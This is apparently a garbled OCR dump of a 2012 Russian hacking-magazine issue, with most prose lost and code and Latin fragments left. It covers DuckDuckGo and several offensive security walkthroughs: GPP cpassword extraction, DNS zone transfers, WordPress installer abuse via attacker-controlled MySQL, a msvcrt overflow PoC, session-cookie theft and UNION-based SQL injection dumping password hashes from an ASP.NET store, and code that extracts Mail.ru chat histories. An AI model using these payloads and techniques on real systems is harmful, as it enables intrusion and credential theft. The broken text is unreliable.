Service ant-vb (/services/udisks.service) successfully


established , avahi .
? WinSwitch .
mDNS .
- ,
~/.winswitch/client/applet.log.
,
mDNS. .
mDNS , ahavi,
. ,
, ,
. ! .

?
WinSwich
, . ,
, , ,

( ,
). ,
WinSwitch Direct Input,

. z

039

PC ZONE

Mifrill (mifrill@real.xakep.ru)

GOOGLE

.

10
DUCKDUCKGO.COM

? Google
? , ,
-
Bing?

,
,

,
.
DuckDuckGo.com.

040

?
. -
Google. DuckDuckGo
, , ,
(
)
privacy: DuckDuckGo , .
,
.

.
, Google
,

.
.

.
G+ , Google . DuckDuckGo
,
Google
. ,
! , :
.
.

200 000 ,
1 000 000
,
(duckduckgo.com/traffic.html),
. 2011
DuckDuckGo
Linux Mint 12. , ,
Linux
.

04 /159/ 2012

Google .

DuckDuckGo ,
Google.

.
-, 7 000
$ .

,
.

.
,
.
:
Google . .
,
,
? http://donttrack.us
,
.
, Google
. ,
? 1 2012
. , Google

, ,
,
, ,
, -

SMS . ?
. Google
,

. Gmail
,
.

Google Docs.
DuckDuckGo IP-, , .
: DuckDuckGo

. . duckduckgo.com/
privacy.html

, ,
,
.


,
,
, ,
, , .

goodies:
. DuckDuckGo: death date of lincoln (
),
Answer:
Saturday, April 15, 1865 (: , 15
, 1865).
, DuckDuckGo
,
?
goodies, goodies,
. ,

OpenStreetMap.

,

.
, area of china
( ) , :
3.705 million mi2 (square miles) (world rank:
4th), assuming china is a country (3.705 .
(4-
),
).
ID,
- (

Go!, ),

ISBN, ,
.
goodies .
heads or tails ( )
,
.
random number, roll die, random word
this or that or none.
roll
3d12 + 4.

DuckDuckGo
, . , ,
,
.
, SEO DuckDuckGo ,
.


.
DuckDuckGo
,
Yahoo! Search BOSS, Wikipedia, Wolfram Alpha
.

GOODIES

goodies
.
.
ip address
IP :).
IP ,

, , 64.207.122.151, DuckDuckGo
,
IP , :
64.207.122.151 is in: Cheyenne, Wyoming,
United States (82002).
goodies useragent, whois
, , ,
.
U+0153 : character
= 339: Latin small ligature oe; Unicode =
U+0153; Decimal = 339; HTML = &#339;.

password * strong passphrase
* words, * .
uuid, guid.

04 /159/ 2012

041

PC ZONE
, DuckDuckGo
Google
,
.
!bang.

.
, -
. ,
. !amazon
watch ( !a watch), amazon.com,
.
!youtube,
!twitter, !wikipedia, ,
. ,
: !g (google), !i (images), !yt
(youtube), !wiki .
bang ,
.

bang : duckduckgo.
com/bang.html ( ).
. random
number ( ), perimeter
triangle 1.5 2 3.2 (
1.5, 2, 3.2), md5 this (
md5- this)
goodies.
,
goodies -, ( ). ,

Wolfram Alpha
.


, .

, ,

, , . Wolfram
Alpha, DuckDuckGo,
.
.

,
, HTTPS ,

DDG.

, .

.
,
. DuckDuckGo
:

DuckDuckGo. .

!bang. .

042

goodies.

04 /159/ 2012

Google .

. .
:
j ;
k ;
/ h ;
esc ;
t ;
m ;
1 ! !bang.
:
Enter l o
;
Ctrl/Cmd+Enter ;
d ( ).

. DuckDuckGo
http://ddg.gg (,
, 4 , google.
com:),
SSL- https://
duckduckgo.com.
Tor.
3g2upl4pq6kufc4m.onion.
DDG .
!proxy -

. DuckDuckGo (, ,
).

.
DuckDuckGo,

,

.
Android iOS
( ).

MultiSeeker (bit.ly/dhbIVF).
. (ye.gg/
chatbot), XMPP
(Jabber).
,
im@ddg.gg. z

. ,
,
. donate

DuckDuckGo .
DuckDuckGo Perl JavaScript
YUI.

nginx,
FastCGI memcached, FreeBSD Ubuntu.
, Amazon
EC2.
PostgreSQL+bucardo, CDB, Solr, BerkelyDB, S3.
DuckDuckGo

GitHub
(github.com/duckduckgo).
?
.
:

, .
,
Duck Duck
Goose. ,
(Google it),
Duck it!
,
, ,
:).

10

DuckDuckGo
.



.
(MIT).
.
The Names Database
United Online 10 000 000
. DuckDuckGo
,

(, ,
).

Blekko (blekko.com)
2010 .
Blekko
, ,

.
. ,
/news

.
Blekko
15 000 000 .

04 /159/ 2012

YaCy (yacy.net)
YaCy P2P.

, Freeworld.

,
. ,
.
YaCy

.

Ixquick (ixquick.com)

Ixquick

. Ixquick,
DuckDuckGo, , . ,

Ixquick,
SSL-
( 2009 ).

Nigma (.)
. Nigma
,
.
,
Google, Yahoo, Bing, ,
Rambler, AltaVista, Aport.
,
.

043

/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK

,
! - ESEC
(goo.gl/zDJFT).
. ,

,
. , Windows
Server 2008 Microsoft Group Policy Preferences (GPP).
Windows Vista Windows 7 , XP
. , . , , , ,
ESEC, .
.
, .
Group
Policy Management (gpmc.msc). , Local Users and Groups Computer
Configuration .

.
.

044

03 /158/ 2012

EASY HACK

ESEC , , . .

SYSVOL- XML- c .
. , . :
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="MyLocalUser"
image="0"
changed="2011-12-26 10:21:37"
uid="{A5E3F388-299C-41D2-B937-DD5E638696FF}">
<Properties action="C" fullName="" description=""
cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
changeLogon="0" noChange="0"
neverExpires="0" acctDisabled="0"

subAuthority=""
userName="MyLocalUser" />
</User>
</Groups>

. , ,
. -,
, AES 256,
, .

.
ESEC. (
), Microsoft
GP , GPP .
,
.

DNS ZONE TRANSFER

-
? ,

- , .

. DNS- ,
. ,
buhgal bank, , , . ,
admin.example.com.

DNS- (reverse),
DNS- IP-.
, ,
, IP-.
, DNS- , .
-, DNS Zone Transfer. , ,
DNS ,
. Zone
Transfer DNS-
, .
, , 53
DNS- TCP AXFR-.
,
nslookup,
Nmap.
nmap --script dns-zone-transfer.nse \
--script-args dns-zone-transfer.domain=<domain>

. , HD Moore. DNS- TLD (top-level-domain: .net,


.org, .xxx ) , -

03 /158/ 2012

Zone transfer .arpa

zone transfer. , 65 312 TLD


. , , .com
.ru, . 250 goo.gl/uVS1X.
:
1. nslookup.
2. DNS- : server 8.8.8.8.
3. : Set type=NS.
4. arpa
DNS-: arpa.
5. DNS- : server b.rootservers.net.
6. : ls d arpa.
, arpa , , . , , .

045

/ EASY HACK

APACHE

,
- . Apache. , .
CMS, ,
, .
- , . .
,
, .
? . , ,
, . ?
, , ,
, . ,
, - ,
, , ,
php-, inc-. inc Apache
-
,
. . ,
? . DirBuster.
, .
. - Apache
mod_negatiation.
.
-, . , -
(), ,
. ,

foo.htm.en foo.htm.de, /foo.htm ,


AcceptLanguage.
MultiViews. ,
foo Apache foo.*,
.
MultiViews
Options MutiViews
. , ? (Stefano Di Paola, goo.gl/ly8HK):
. ? . 2007
, Accept
mod_negatiation
,
. , foo , Accept,
:

GET /foo HTTP/1.1


Accept: */*

HTTP/1.1 200 OK
Server: Apache/2.0.55
Content-Location: foo.php
Vary: negotiate,accept
TCN: choice

046

04 /159/ 2012

EASY HACK

A , Accept,
:

GET /foo HTTP/1.1


Accept: xxx/blabla

HTTP/1.1 406 Not Acceptable


Server: Apache/2.0.55
Alternates: {"foo.bak" 1 {type application/x-trash} {length 3}},
{"foo.php" 1
{type application/x-httpd-php} {length 3}}
Vary: negotiate,accept
TCN: list

? , ,
. , ,

, ,

. ,
- , (AddType).
.php~ , , .
, , Apache .
. ,
Apache.
,
( )
.
Metasploit (auxiliary/
scanner/http/mod_negotiation_brute), , Acunetix . mod_negotiation
nmap:
nmap --script=http-apache-negotiation p80 sV


- CMS

. , - - ( ).
,
.
( https).
, , CSRF:
https://victim.com/admin.php?adduser=1&user=hacker&
password=hacker

,
.
, - . ,

CSRF. . , .
https://victim.com/admin.php?adduser=1&user=hacker&
password=hacker&token=long_random_bukva_cifra

, CSRF . ? , XSS. ,
(
). XSS .

, reflected XSS (
), stored XSS (
) . reflected
XSS. IE. /
.
, - ?
flash. . -,

04 /159/ 2012

( :). -,
.
flash
. evil.com
, victim.com .
evil.com, victim.com,
! , , .
? . same origin
policies. evil.com , victim.com , .
, ,
crossdomain.xml. , . victim.com.
, -
victim.com, victim.com/crossdomain.xml
,
.
. , ,
adobe goo.gl/A02R1.
:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control
permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.victim.com" secure="false"/>
<allow-access-from domain="www.microsoft.com"/>
</cross-domain-policy>

. ,
, allow-access-from, ,
. victim.com

047

/ EASY HACK
Microsoft. Master-only ,
crossdomain.xml, , ,
.
. , DNS NBNS-spoofing
victim.com , ,
. ,
victim.com.
secure (- true),
, c https. (false) victim.com Man-in-the-middle,
HTTP- . ,
https' .
.
-, - - ,
,
, , .
-, crossdomain.xml
, .
, - victim.com. -,
crossdomain.xml .

(
site-control master-only), -
. ,
victim.com,
xml.
,
<allow-access-from
domain=* >.
,
. ? . Alexa Top 50 000
- (goo.gl/rlCL1).

Silverlight Microsoft.
, . clientaccesspolicy.xml,
Silverlight , crossdomain.xml.
clientaccesspolicy.xml
(*)
http- https-. ,
xml.

COOKIES HTTPONLY

XSS
-. ,
. , XSS .
,
XSS .
document.cookie.
, -,
IE6. httpOnly.
, ,
javascript. , .
,
,
.
, httpOnly .
? cross-site tracing.
2003 , -
GET- POST- TRACE-. : -
, . :
XSS ,
TRACE,
.
(basic ntlm). , -
.

.
Apache. , 2.2 2.2.22. , TRACE,
-.
(Norman Hippert, goo.gl/ndGpv) ,
400 (HTTP 400 Bad Request)

048

Apache 2.2.

TRACE-. - , .

. ,
.
PoC :
javascript
.

04 /159/ 2012

!
shop.glc.ru



40%

8-800-200-3-999
+7 (495) 663-82-77 ()

6 1110 .
13 1999 .

6 1110 .
13 1999 .

6 564 .
13 1105 .

6 1110 .
13 1999 .

6 810 .
13 1499 .

6 1110 .
13 1999 .

6 630 .
13 1140 .

6 895 .
13 1699 .

6 1194 .
13 2149 .

6 894 .
13 1699 .

6 775 .
13 1399 .

6 950 .
13 1699 .

6 810 .
13 1499 .



AUDI A7

NEED FOR SPEED: THE RUN







"./# .1



350.589



;8IEB?8G
4@4EB



.EEDFOR3PEED4HE2UN
.E

4OYOTA#AMRY

6 690 .
13 1249 .

(ivinside.blogspot.com)
(115612, . , .1)

,
.
...
050

04 /159/ 2012

MS12-013:
C (msvcrt.dll)

CVSSV2

9.3
(AV:N/AC:M/AU:N/C:C/I:C/A:C)

BRIEF

Msvcrt.dll (DLL) C,
. msvcrt.dll ,
,
.
.
, , ,
,
, ,
.
, , , ,
.
EXPLOIT

MS _ _check_float_string().
, C
MS Visual Studio,
VC/CRT/src/input.c.
_ _check_float_string() .

(_TCHAR floatstring[_CVTBUFSIZE
+ 1];). , . :
, .

calloc(), recalloc(). ,
MS12-013,
.
- msvcrt.dll:
.text:6FFBEA1E loc_6FFBEA1E: ; CODE XREF: sub_6FFBE9F3+25|j
.text:6FFBEA1E push 2

.text:6FFBEA20 push ebx ; mov ebx, [esi] in the entry block


.text:6FFBEA21 call __calloc_crt
.text:6FFBEA26
.text:6FFBEA27
.text:6FFBEA28
.text:6FFBEA2A
.text:6FFBEA2C
.text:6FFBEA2E
.text:6FFBEA31
.text:6FFBEA34
.text:6FFBEA37
.text:6FFBEA3D
.text:6FFBEA3F

pop ecx
pop ecx
mov [edi], eax
test eax, eax
jz short loc_6FFBEA1A
push [ebp+pulResult] ; size_t
mov eax, [ebp+arg_8]
push [ebp+arg_4] ; void *
mov dword ptr [eax], 1
push dword ptr [edi] ; void *
call _memcpy

.text:6FFBEA44 mov eax, [esi]


.text:6FFBEA46 push esi ; pulResult
.text:6FFBEA47 add eax, eax ; !!!!
.text:6FFBEA49 push 2 ; int
.text:6FFBEA4B push eax ; int
.text:6FFBEA4C mov [esi], eax
.text:6FFBEA4E call ?SizeTMult@@YAJIIPAI@Z
; SizeTMult(uint,uint,uint *)
.text:6FFBEA53 add esp, 18h
.text:6FFBEA56 test eax, eax
.text:6FFBEA58 jge short loc_6FFBEA78

_ _calloc_crt()
SizeTMult(). _ _calloc_crt()
: __calloc_crt(Size, 2). ,
SizeTMult,
:
SizeTMult(Size*2, 2, &pResult)

,
Size*2,
Size*2*2. ,
- .
.
SizeTMult(). SizeTMult(Size, 2, &pResult).
MS add eax, eax:
.text:6FFBF935 push [ebp+pulResult] ; size_t
.text:6FFBF938 mov eax, [ebp+arg_8]
.text:6FFBF93B push [ebp+arg_4] ; void *
.text:6FFBF93E mov dword ptr [eax], 1
.text:6FFBF944 push dword ptr [esi] ; void *
.text:6FFBF946 call _memcpy
.text:6FFBF94B push edi ; pulResult
.text:6FFBF94C push 2 ; int
.text:6FFBF94E push dword ptr [edi] ; int
.text:6FFBF950 call ?SizeTMult@@YAJIIPAI@Z
; SizeTMult(uint,uint,uint *)
.text:6FFBF955 add esp, 18h

POC MS12-013:
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/NODEFAULTLIB:msvcrt90.lib")
#pragma comment(linker, "/NODEFAULTLIB:msvcrt80.lib")
#pragma comment(lib, "vs6/msvcrt.lib")
check_float_string CRT

04 /159/ 2012

051

/
#define BUF_SIZE 0x300
void main( void )
{
char *pStr;
float f;
int i;

Adobe Flash Player:


MP4
SequenceParameterSetNALUnit

CVSSV2

10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)

BRIEF
pStr = (char*)malloc(BUF_SIZE);
memset(pStr, 0, BUF_SIZE);
strcpy(pStr, "1.");
for( i=1; i<=BUF_SIZE-10; i++)
{
strcat(pStr, "0");
}
printf("Before scanf()\n");
sscanf(pStr,"%f", &f);

10 2012 metasploit- ,
mp4-, Flash10u.ocx Adobe Flash Player.
sequenceParameterSetNALUnit.
num_ref_frames_in_pic_order_cnt_cycle, , Flash

offset_for_ref_frame , . ,
Flash-.
, ITW.

printf("After scanf()\n");

EXPLOIT

printf("%f\n", f);

( sub_1005B396), Flash10u.ocx
10.3.181.34:

}
TARGETS

Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008


SOLUTION

,
.

.text:1005B482
call
SubReadUExpGlomb
; pic_order_cnt_type
.text:1005B487
mov
[esi+40h], eax
.text:1005B48A
cmp
eax, ebp
; pic_order_cnt_type != 0 (ebp=0)
.text:1005B48C
jnz
short loc_1005B49D
; ...

ms12-013:

052

04 /159/ 2012

.text:1005B49D
xor
ebx, ebx
.text:1005B49F
inc
ebx
.text:1005B4A0
cmp
eax, ebx
.text:1005B4A2
jnz
short loc_1005B4EF
; pic_order_cnt_type != 1
.text:1005B4A4
mov
ecx, edi
.text:1005B4A6
call
SubReadBit
; delta_pic_order_always_zero_flag
.text:1005B4AB
mov
ecx, edi
.text:1005B4AD
mov
[esi+48h], al
.text:1005B4B0
call
SubReadSExpGlomb
; offset_for_non_ref_pic
.text:1005B4B5
mov
ecx, edi
.text:1005B4B7
mov
[esi+54h], eax
.text:1005B4BA
call
SubReadSExpGlomb
; offset_for_non_ref_pic
.text:1005B4BF
mov
ecx, edi
.text:1005B4C1
mov
[esi+50h], eax
.text:1005B4C4
call
SubReadUExpGlomb
; num_ref_frames_in_pic_order_cnt_cycle
.text:1005B4C9
mov
[esi+4Ch], eax
.text:1005B4CC
test
eax, eax
.text:1005B4CE
jbe
short loc_1005B4EF
; num_ref_frames_in_pic_order_cnt_cycle == 0
.text:1005B4D0
lea
eax, [esi+58h]
.text:1005B4D3
mov
[esp+10h+ptr], eax
.text:1005B4D7
.text:1005B4D7 loc_1005B4D7:
; CODE XREF: SubParseSeqParameterSet+157|j
.text:1005B4D7
mov
ecx, edi
.text:1005B4D9
call
SubReadSExpGlomb
; offset_for_ref_frame
.text:1005B4DE
mov
ecx, [esp+10h+ptr]
.text:1005B4E2
add
[esp+10h+ptr], 4
.text:1005B4E7
inc
ebp ; ebp -
.text:1005B4E8
mov
[ecx], eax
; ecx
.text:1005B4EA
cmp
ebp, [esi+4Ch] ;
; c num_ref_frames_in_pic_order_cnt_cycle
.text:1005B4ED
jb
short loc_1005B4D7

SubReadUExpGlomb() .
SubReadSExpGlomb() . SubReadBit()
. ,
num_ref_frames_in_pic_order_cnt_
cycle. Flash Player
stack cookies,
eip - .
TARGETS

Adobe Flash Player <= 10.3.181.36


SOLUTION

10.3.183.5

WordPress

CVSSV2

7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)

, setup-config.php,

Claudius)
WordPress. - PHP-,
XSS-, MySQL.
EXPLOIT

1. PHP- XSS
setup-config.php.
WordPress MySQL.
MySQL.
MySQL
,
/ MySQL . WordPress PHP- WordPress. ,
WordPress
Javascript- ,
XSS.
. , A.B.C.D -
WordPress, W.X.Y.Z - MySQL.
POST- GET- WordPress :

BRIEF

Trustwave SpiderLabs
(Jonathan

04 /159/ 2012

POST-
POST /wp-admin/setup-config.php?step=2 HTTP/1.1

053

/
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6;
rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480;
wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z
&prefix=wp_&submit=Submit
GET-
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480;
wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT

WordPress 404.php
( , ),
PHP-:
<?php
phpinfo();
?>

GET- :
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

XSS
,
:
UPDATE wp_comments SET
comment_content='<script>alert('123')</script>' where
comment_content='Hi, this is a comment.<br />To delete
a comment, just log in and view the post&#039;s
comments. There you will have the option to edit
or delete them.';

, GET, Javascript-:
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X

054

10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

2. XSS setup-config.php. Javascript-


dbname, dbhost uname.
POST-:
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&
uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit

3. MySQL
setup-config.php.
MySQL,
. , ,
MySQL, ,
. :
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X
10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,
application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
uname=user&pwd=pass&dbhost=L.M.N.O

L.M.N.O user pass.


TARGETS

WordPress 3.3.1 .
SOLUTION

- ,
WordPress
.

, . ,
WordPress ,
.

MySQL, WAF, , ModSecurity,
. z

04 /159/ 2012

(blog.chivavas.org)

ASP.NET:

DVD



Music
Store


ELMAH
,
,

,
, ,
. ELMAH
ASP.NET-.

Web- ELMAH

056


,
, , . , , ,
. -,
. (deadlock) :
,
. -, . ,

web-. : 99%,
, .
: -?
:
:
, ,
.
, ,
.
,
.

04 /159/ 2012

ASP.NET:


ELMAH ,
,
,

. 2007

web-,
ASP.NET. Web-
Trace.axd, ELAMH,

.

.
Rapid7.
, SQL-

(, ,
) , .
,
? , , , ,
, 80%
.

ELMAH?
ELMAH ( Error Logging Modules and
Handlers) , (Atif Aziz).
, ASP.NET.
(ELMAH 1.1 NuGet 11
2011 ),
.NET. , NuGet,
45 583 .
ELMAH . web-
:
NuGet ! , ELMAH ,
!
Web.config. .
, ELMAH :
,
RSS .

04 /159/ 2012

.
web- ASP.NET MVC
Music Store, .
CodePlex, ELMAH,

. web- Visual Studio IIS.
,
http://localhost/MusicStore.


,
ELMAH. Music Store
, Admin .
admin p@ssw0rd .
- .
ASP.NET MVC,
, 404, , . ? . ,
. web ELMAH, http://localhost/
MusicStore/elmah.axd. ,
, ELMAH, 404,
. ,
ELMAH. Details
. -, ELMAH
: ,
. ? .

, (
), ,
, . , ! ,
, , ,
-
. , ELMAH customErrors ASP.NET,
web-.

, customError on (),

057


ELMAH,
.
. ELMAH . , , , ,
, HTTP_COOKIE, HTTP_HOST,
HTTP_USER_AGENT .
HTTP_COOKIE AUTH_USER.
AUTH_USER ,
.
admin. HTTP_COOKIE . ,
.ASPXAUTH.
.
, ,

. ,
ASP.NET_SessionId.
. ,
- .

. :
.ASPXAUTH ASP.NET_SessionId .


. . ELMAH
. ,
.
. ,
. -, ELMAH
RSS.
http://localhost/MusicStore/elmah.axd/rss RSS
, :).
? . , -
( ELMAH).
: .
Music Store, 404.
, : http://localhost/MusicStore/Store/
Browse>aspx". , 400 ,
ELMAH. , . , , .
. web- ELMAH
.
- :

ELMAH Web.config

058

Music Store SQL-

ASP.NET_SessionId=3dljmclkhjpat52quopccijj;
.ASPXAUTH=CDB45013DD38AD7D2759BA6FAA7D98F07
...
B84C6CB5BCC76E7AE899690CC2016B5F1BCE9CDCBAA

.
Firefox Firebug Firecookie.
ASP.NET_SessionId ,
. .ASPXAUTH.
! , Admin
. ,
, ,
.


ELMAH
, .
SQL Injection Music Store.
Music
Store Microsoft . , . http://
localhost/MusicStore/Search. ,
. ,
SQL-, ,
. ELMAH, ,
. - "' or select 1 from abcdef".
, abcdef
( ). , .
, SQL-. ELMAH
:
System.Data.SqlClient.SqlException (0x80131904):
Incorrect syntax near the keyword 'select'.
Incorrect syntax near '%'.
Unclosed quotation mark after the character string ''.

? -,
SQL Server. -, .
.
, ELMAH ,
SQL-, .
Sql.
CSV,
http://localhost/MusicStore/elmah.axd/download,
Microsoft Excel .
. : "' or 1
= 1 --". ? . -

04 /159/ 2012

ASP.NET:

WWW
ELMAH
( ,
..):
code.google.com/p/
elmah.

NuGet: nuget.org.
web ASP.
NET MVC Music Store:
mvcmusicstore.
codeplex.com/.;
Firebug:
getfirebug.com.
Firecookie:
bit.ly/gMhx7B.
Visual Web Developer 2010 Express:
bit.ly/ldalNH.;
SQL Server 2008
Express:
bit.ly/AtJpCt.



ASP.NET (Trace.axd):
bit.ly/xaZzSn.

Web- ELMAH

,
.
Music Store, ASP.NET MVC SQL
Server, web- (
, .ASPXAUTH). ,
, ASP.NET,
2.0. , aspnet_Users aspnet_Membership.
, : "Hits'
and exists(select 1 from sys.tables where name = 'aspnet_
Users') --". .
.
( , ),
: .
:
select 1, u.UserName + ':' + m.Password + ':' +
m.PasswordSalt from dbo.aspnet_Users as u
inner join dbo.aspnet_Membership as m on u.UserId =
m.UserId

,
:
"' and 1 <> 1 union all select 1, u.UserName + ':' +
m.Password + ':' + m.PasswordSalt from dbo.aspnet_Users
as u inner join dbo.aspnet_Membership as m on u.UserId =
m.UserId --"

?
, ,
, , . ,

ELMAH, web-. ,
.
ELMAH
, ,
.

04 /159/ 2012

ASP.NET,
Web.config . web-,
:
1. ELMAH configuration/
system.web/httpHandlers configuration/system.webServer/
handlers Web.config;
2. configuration XML:
<location path="elmah.axd">
<system.web>
<httpHandlers>
<add verb="POST,GET,HEAD" path="elmah.axd"
type="Elmah.ErrorLogPageFactory, Elmah" />
</httpHandlers>
<authorization>
<allow roles="Administrator" />
<deny users="*" />
</authorization>
</system.web>
<system.webServer>
<handlers>
<add name="Elmah" path="elmah.axd"
verb="POST,GET,HEAD"
type="Elmah.ErrorLogPageFactory, Elmah"
preCondition="integratedMode" />
</handlers>
</system.webServer>
</location>

! c Administrator
ELMAH, , .

, ,

,
.
, , . z

059

Gar|k (garik@coru.ws)

u
.R
il
Ma


Mail.
Ru ,
,

.



21,4
.
,
.

,

.
060

WARNING

138
,

,
,


,

28

(.
272, 273, 274).

DVD


mra.dbs,
,


WinHex-,


2008 ,
Mail.ru .
*email*history.txt mra.dbs
(,
) .
, RTF-, .
. , ,
Mail.ru History Reader,
][ 2009 .
,
(. ) . Mail.ru ,
mra.dbs.
. SOLON7
HEX-, ,

Mail.ru . 2010
- .

04 /159/ 2012

Mail.Ru

MRA.DBS?
, , : , ,
mra.dbs, ? mra.dbs
%APPDATA%\Mra\Base\mra.dbs ( C:\Documents and Settings\user\Application Data\Mra\
Base\mra.dbs),
,
ExpandEnvironmentStrings CopyFile.
mra.dbs
. ,
, (
,
)
, . (, ,
)
(
). , .
ZwQuerySystemInformation
DuplicateHandle
. ,
ZwQueryInformationFile ,
. ( ) FileObject,
-.
,

, . ,
,
,
. , , .
,
FILE_READ_ATTRIBUTES ( ),
, (
) (
NTFS MFT).
, (
).
.
, Mail.ru , (ProcessID).
: ToolHelp API, Native API
( ZwQuerySystemInformation),

(GetWindowThreadProcessId).
ToolHelp API exe-.
CreateToolhelp32Snapshot >
Process32First > Process32Next,
szExeFile PROCESSENTRY32 c magent.
exe. ProcessID ,
th32ProcessID:
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if( INVALID_HANDLE_VALUE != hProcessSnap)
{
pe32.dwSize = sizeof( PROCESSENTRY32 );
if( Process32First( hProcessSnap, &pe32 ) )
{
do
{
if(0 == lstrcmp(pe32.szExeFile,_TEXT("magent.exe")))
{

04 /159/ 2012

pid=pe32.th32ProcessID;
break;
}
}
while(Process32Next( hProcessSnap, &pe32 ));
}
CloseHandle( hProcessSnap );
}

PID,
SeDebugPrivilege (OpenProcessToken >
LookupPrivilegeValue > AdjustTokenPrivileges)
(OpenProcess > TerminateProcess), CopyFile.
Native API:
void GetPrivilege(IN ULONG Privilege)
{
BOOLEAN OldValue;
RtlAdjustPrivilege(Privilege, TRUE, FALSE, &OldValue);
}

, mra.dbs . :).

MRA.DBS
mra.dbs Mail.ru ,

( ,
:), ,
.
-.
, mra.dbs -,
4- .
,
( ):
typedef struct _ids {
unsigned int id1;
unsigned int id2;
unsigned int count;
} _ids;


mrahistory_, e-mail mra.dbs
e-mail , . :
,
. ,
( _ids).

061

( ) (
):
struct _message
{
unsigned int size;
unsigned int prev_id;
unsigned int next_id;
unsigned int xz1;
FILETIME time;
unsigned int type_mesage;
char flag_incoming;
char byte[3];
unsigned int count_nick;
unsigned int magic_num; // 0x38
unsigned int count_message;
unsigned int xz2;
unsigned int size_lps_rtf;
unsigned int xz3;
};

,
, .
, 0x2C , , ,
.
:

( );
0x190
mrahistory_, , 0x24
.
, :

Unicode (wchar_t) :
;
LPS ( MMP),
;
RTF.
, . ,
-, ?
SOLON7
.


0x10 mra.dbs, , -.
-, . , ,
mra.dbs. . 0x20

DWORD * offset_table=(DWORD *)(mra_base +


*(DWORD*)(mra_base + 0x10));
DWORD end_id_mail=*(DWORD*)(mra_base+0x20+
offset_table[1]);
DWORD count_emails=*(DWORD*)(mra_base+0x2C+
offset_table[1]);
...
for(int i=0;i<count_emails;i++)
{
_ids *mail_data=(struct _ids*)(mra_base+
offset_table[end_id_mail]+4);
if(memmem(((unsigned char*)mail_data+0x190),
mrahistory,...))
{
emails[k].id=(_ids*)((unsigned char*)mail_data+0x24);
...
}
end_id_mail=mail_data->id2;
}

, mra.dbs
. .
, mra.dbs ,

, .
Windows Memory Mapped
:

MRA.DBS

2 4 7 10 35 46

062

04 /159/ 2012

Mail.Ru

WWW

INFO


Mail.ru
5.4:
bit.ly/z2ETMY;
Mail.ru
History Reader:
bit.ly/xZoKvU;
:
c0dedgarik.blogspot.
com;
++
winhex.
pos-:
bit.ly/zsTJTb;


:
bit.ly/zNgQ2S;


:
bit.ly/w4upzS;


Visual
Studio:
bit.ly/w7sWNA.

-
,

,

.


,


,

.

CreateFile
CreateFileMap
MapViewOfFile
VirtualFree
CloseHandle
CloseHandle


, UnmapViewOfFile VirtualFree.
, , . emails:
typedef struct _emails{
wchar_t *email;
_ids *id;
};
...
struct _emails *emails;
...
emails=VirtualAlloc(0,count_emails*sizeof(struct _emails),..);

RICH TEXT FORMAT (RTF)


RTF, mra.dbs,
, 1982
Microsoft Adobe.
,
EM_STREAMIN SF_RTF
EM_STREAMOUT SF_TEXT :
EDITSTREAM es = { 0 };
es.pfnCallback = EditStreamCallback;
